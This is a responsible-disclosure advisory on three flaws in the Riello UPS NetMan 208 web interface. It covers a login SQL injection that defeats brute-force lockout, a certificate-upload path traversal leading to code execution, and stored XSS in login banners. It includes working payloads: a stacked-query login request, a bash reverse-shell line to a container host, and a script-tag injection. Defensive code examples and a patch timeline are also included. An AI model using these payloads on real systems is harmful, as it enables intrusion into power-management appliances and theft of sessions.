During a client engagement, we identified the presence of a Riello UPS appliance within the target environment.
Without prior knowledge of its internal architecture or credentials, we conducted a series of black-box tests to assess potential exposure and evaluate the appliance’s resilience against unauthorized access and common attack vectors. We then downloaded the firmware from the vendor’s website to conduct further tests. The analysis led to the identification of several vulnerabilities that may allow an attacker to exploit specific weaknesses in the appliance’s security mechanisms, which we disclose here following the responsible disclosure process.
In the following section, we present the test environment we set up and the technical details of the vulnerabilities we found.
In order to validate the findings in a controlled and reproducible manner, we performed a secondary assessment of the software executed on the appliance, deployed in a dedicated virtualized environment. This allowed us to confirm the issues independently of the production environment and rule out any context-specific variables.
Specifically, a Docker container was prepared with the NetMan application, obtained by extracting the firmware image downloaded for the Riello UPS NetMan 208. The base image used is the latest Ubuntu and the JDK installed was zulu11.80.21-ca-jdk11.0.27. The NetMan software was executed as the root user.
With this setup, we can assume that the vulnerable Riello UPS NetMan 208 versions are:
| component | version |
|---|---|
| NetMan 208 Operating System: | Version 1.5 |
| NetMan 208 Application: | Version 1.11 |
| NetMan 208 JVM: | Version 1.0 |
A SQL Injection exists in Riello UPS with NetMan 208 due to improper validation of user-supplied input in the username field of /cgi-bin/login.cgi. This makes it possible for unauthenticated attackers to run stacked queries against the LOGINFAILEDTABLE table and bypass the brute-force protection of the "standard" login (i.e. non-LDAP).
By exploiting a SQL Injection in the login workflow we were able to delete the content of the LOGINFAILEDTABLE table, which circumvents the rate-limit protection against brute-force attacks. The following is the HTTP request used in the proof of concept:
```http
POST /cgi-bin/login.cgi HTTP/1.1
Host: <virtual-host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 94
Connection: keep-alive

logintype=standard&username=admin';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- &password=bbbbbb
```
Detailed description
Trying to log in several times with wrong credentials, the application locks the account and shows the user the message "Please wait before try again".
The analysis highlighted that the username parameter is vulnerable to SQL Injection. It is possible to exploit it with stacked queries to delete all entries in the LOGINFAILEDTABLE table with the payload `';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- `. With the admin user, for example, the request body can be:
```text
logintype=standard&username=admin';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; --&password=try
```
As shown in the following evidence, the first response is again "Please wait before try again", but the database table is now empty.
When trying to log in again with a valid username, the user-lock check no longer applies and the attempt goes through. Requests with the SQL Injection payload and normal login requests can be alternated to avoid the brute-force protection. The attack can also be automated by sending the SQL Injection to empty the table after a number of attempts (for example 3), bypassing the brute-force protection.
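To make the defect concrete, the following added example (not NetMan's code) models the lockout check behind /cgi-bin/login.cgi with an in-memory SQLite table: the injectable, stacked-statement version beside a parameterised one, driven by the advisory's own username payload. The table and column names, the failure threshold and the use of SQLite are assumptions.

```python
# Added example (not NetMan's code): models the lockout check behind
# /cgi-bin/login.cgi with an in-memory SQLite table to contrast the injectable
# query building with a parameterised one. Table/column names are assumptions.
import sqlite3

MAX_FAILURES = 3  # assumed lockout threshold
# Username value from the advisory's proof-of-concept request
PAYLOAD = "admin';DELETE FROM LOGINFAILEDTABLE WHERE 1=1; -- "


def fresh_db() -> sqlite3.Connection:
    """Constructed sample state: three recorded failures for 'admin'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE LOGINFAILEDTABLE (username TEXT, ts INTEGER)")
    db.executemany("INSERT INTO LOGINFAILEDTABLE VALUES (?, ?)",
                   [("admin", 1), ("admin", 2), ("admin", 3)])
    return db


def remaining_failures(db: sqlite3.Connection) -> int:
    return db.execute("SELECT count(*) FROM LOGINFAILEDTABLE").fetchone()[0]


def is_locked_vulnerable(db: sqlite3.Connection, username: str) -> bool:
    """Vulnerable pattern: the username is concatenated into the SQL text and
    handed to a driver that executes stacked (';'-separated) statements.
    The split loop below is a simplified stand-in for such a driver."""
    sql = ("SELECT count(*) FROM LOGINFAILEDTABLE WHERE username='"
           + username + "'")
    results = []
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if stmt and not stmt.startswith("--"):   # '-- ' comments out the rest
            results.append(db.execute(stmt).fetchone())
    return results[0][0] >= MAX_FAILURES  # decided before the smuggled DELETE ran


def is_locked_safe(db: sqlite3.Connection, username: str) -> bool:
    """Fixed pattern: bound parameter, so the payload is just an unknown user.
    sqlite3.execute() additionally refuses more than one statement per call."""
    row = db.execute(
        "SELECT count(*) FROM LOGINFAILEDTABLE WHERE username = ?", (username,)
    ).fetchone()
    return row[0] >= MAX_FAILURES
```

The vulnerable version still answers "locked" to the injected request, exactly as the advisory observes, yet the very next normal attempt for admin is no longer blocked.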
An arbitrary file upload exists in Riello UPS with NetMan 208, specifically in /cgi-bin/certsupload.cgi. This vulnerability allows authenticated attackers to achieve remote code execution by uploading malicious files.
By exploiting an arbitrary file upload in the certificate upload feature as an admin user, it’s possible to overwrite existing resources on the server file system. An attacker can overwrite an existing CGI file, which will be executed as soon as the script is accessed.
Detailed description
When an admin user uploads a certificate file, the web application appears to utilize the raw, user-provided filename to save it locally on the file system. This is vulnerable to path traversal and arbitrary file write and allows an attacker to overwrite files within the file system by specifying the full path as the filename.
In this scenario, we were able to modify the contents of the /cgi-bin/runin.cgi file to execute the following arbitrary commands:
```bash
echo "execution code"
echo "$id"
```
As you can see in the following screenshot:
Calling /cgi-bin/runin.cgi executes the payload:
In a real scenario a potential attacker could execute more complex commands, such as a bash reverse shell that runs whenever the file is called. This could lead to a complete compromise of the system through remote code execution.
So, as a proof of concept, we wrote the following reverse shell code:
```bash
bash -i >& /dev/tcp/172.17.0.1/4444 0>&1 &
```
As shown in the following screenshot:
And we gain a remote shell on NetMan 208:
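The root cause above is a handler that trusts the client-supplied filename. The following added example (not NetMan's code) shows that pattern next to a hardened certificate-upload handler that accepts only a bare, allow-listed file name and re-checks the resolved path; the upload directory and the allowed extensions are assumptions.

```python
# Added example (not NetMan's code): how /cgi-bin/certsupload.cgi should treat
# the client-supplied filename. The upload directory and allowed extensions
# are assumptions.
import re
from pathlib import Path, PurePosixPath

CERT_DIR = Path("/tmp/netman-example/certs")          # assumed upload directory
ALLOWED_EXT = {".pem", ".crt", ".cer", ".key"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def vulnerable_target(filename: str, upload_dir: Path = CERT_DIR) -> Path:
    """Pattern the advisory describes: the raw filename is joined to the
    upload directory. An absolute name replaces upload_dir entirely and
    '..' components walk out of it."""
    return Path(upload_dir, filename)


def escapes_upload_dir(target: Path, upload_dir: Path = CERT_DIR) -> bool:
    """True when the resolved write location is outside upload_dir."""
    return upload_dir.resolve() not in target.resolve().parents


def safe_target(filename: str, upload_dir: Path = CERT_DIR) -> Path:
    """Hardened handler: accept only a bare, allow-listed certificate file
    name and double-check the resolved path. Raises ValueError otherwise."""
    if filename in ("", ".", "..") or PurePosixPath(filename).name != filename:
        raise ValueError("filename must not contain directory components")
    if not SAFE_NAME.match(filename):
        raise ValueError("filename contains disallowed characters")
    if PurePosixPath(filename).suffix.lower() not in ALLOWED_EXT:
        raise ValueError("not a certificate or key file")
    root = upload_dir.resolve()
    target = (root / filename).resolve()
    if target.parent != root:                 # belt and braces after the checks
        raise ValueError("resolved path escapes the upload directory")
    return target


def upload_rejected(filename: str) -> bool:
    """Convenience wrapper: True if the hardened handler refuses the name."""
    try:
        safe_target(filename)
        return False
    except ValueError:
        return True
```

Note that a name such as runin.cgi is refused even without any path component, because the extension allow-list rules out writing executable scripts at all.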
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Riello UPS with NetMan 208 due to improper validation of user-supplied input in /cgi-bin/loginbanner_w.cgi. An authenticated attacker can inject malicious script into the pre/post-login banner title and message, which will be executed when viewed by anyone visiting the home page.
The login banner functionality allows injecting a JavaScript payload into the banners; the payload is executed in the browser of any user who accesses a page with the embedded banners (for example the login page).
Detailed description
Authenticated administrative users can modify the various banners, such as the pre-login banner and the post-login banners. No input sanitization mechanism was identified during editing. Since no restriction on HTML tags was detected, it is also possible to embed any tag. If an administrator changes a banner to include JavaScript code enclosed in a `<script>` tag, it is executed in the victim’s browser.
For example, if you modify the pre_login_banner_title POST field in /cgi-bin/loginbanner_w.cgi with a basic Cross-Site Scripting payload like this one:
```html
<script>alert('xss')</script>
```
As you can see in the following request:
The script is executed by the browser of whoever visits the Riello UPS NetMan 208 login page.
Other vulnerable fields in this request are: pre_login_banner_message, post_login_admin_banner_title, post_login_admin_banner_message, post_login_power_banner_title, post_login_power_banner_message, post_login_view_banner_title, post_login_view_banner_message.
Please note that, even though this issue is only exploitable as an admin user, the session cookie does not have the HttpOnly flag set, so the XSS could be used to obtain other users’ (viewer/power) cookies.
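The fix for the banner issue is escape-on-output for every banner field, and the cookie observation calls for HttpOnly. The following added example (not NetMan's code) applies both to the field names and payload from this advisory; the HTML fragment, the cookie name and the other cookie attributes are assumptions.

```python
# Added example (not NetMan's code): escape-on-output for the banner fields
# set through /cgi-bin/loginbanner_w.cgi, and a session cookie issued with
# HttpOnly. The HTML fragment and the cookie name are assumptions.
from html import escape

# Field names taken from the advisory; anything else in the form is dropped.
BANNER_FIELDS = (
    "pre_login_banner_title", "pre_login_banner_message",
    "post_login_admin_banner_title", "post_login_admin_banner_message",
    "post_login_power_banner_title", "post_login_power_banner_message",
    "post_login_view_banner_title", "post_login_view_banner_message",
)
# Payload from the advisory, as the vulnerable handler would store it
XSS = "<script>alert('xss')</script>"


def store_banner_form(form: dict) -> dict:
    """Keep only known fields. Raw text may be stored as long as every
    rendering path escapes it; filtering tags on input is not the fix."""
    return {k: form.get(k, "") for k in BANNER_FIELDS}


def render_banner_vulnerable(title: str, message: str) -> str:
    """What the advisory describes: stored text is placed into HTML as-is."""
    return f'<div class="banner"><h2>{title}</h2><p>{message}</p></div>'


def render_banner_safe(title: str, message: str) -> str:
    """Escape &, <, >, \" and ' so stored text can never become markup."""
    return (f'<div class="banner"><h2>{escape(title, quote=True)}</h2>'
            f"<p>{escape(message, quote=True)}</p></div>")


def session_cookie(value: str) -> str:
    """Set-Cookie value for the session (cookie name assumed): HttpOnly keeps
    it out of document.cookie, so a surviving XSS still cannot read it."""
    return f"sessionid={value}; Path=/; Secure; HttpOnly; SameSite=Strict"
```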
We’ve decided to follow the industry standard 90+30 days responsible disclosure process; here’s the timeline:
- November 11, 2025: Sent initial report to Riello’s security team ([email protected]) with full technical details and PoC exploits, all compiled according to their Vulnerability Disclosure Policy.
- November 14, 2025: Riello confirms they’ve successfully replicated the vulnerabilities and sets the timeline for the remediation patch at three to four weeks.
- December 23, 2025: Riello publishes a new APP release (1.12), available on the Driver & Download page.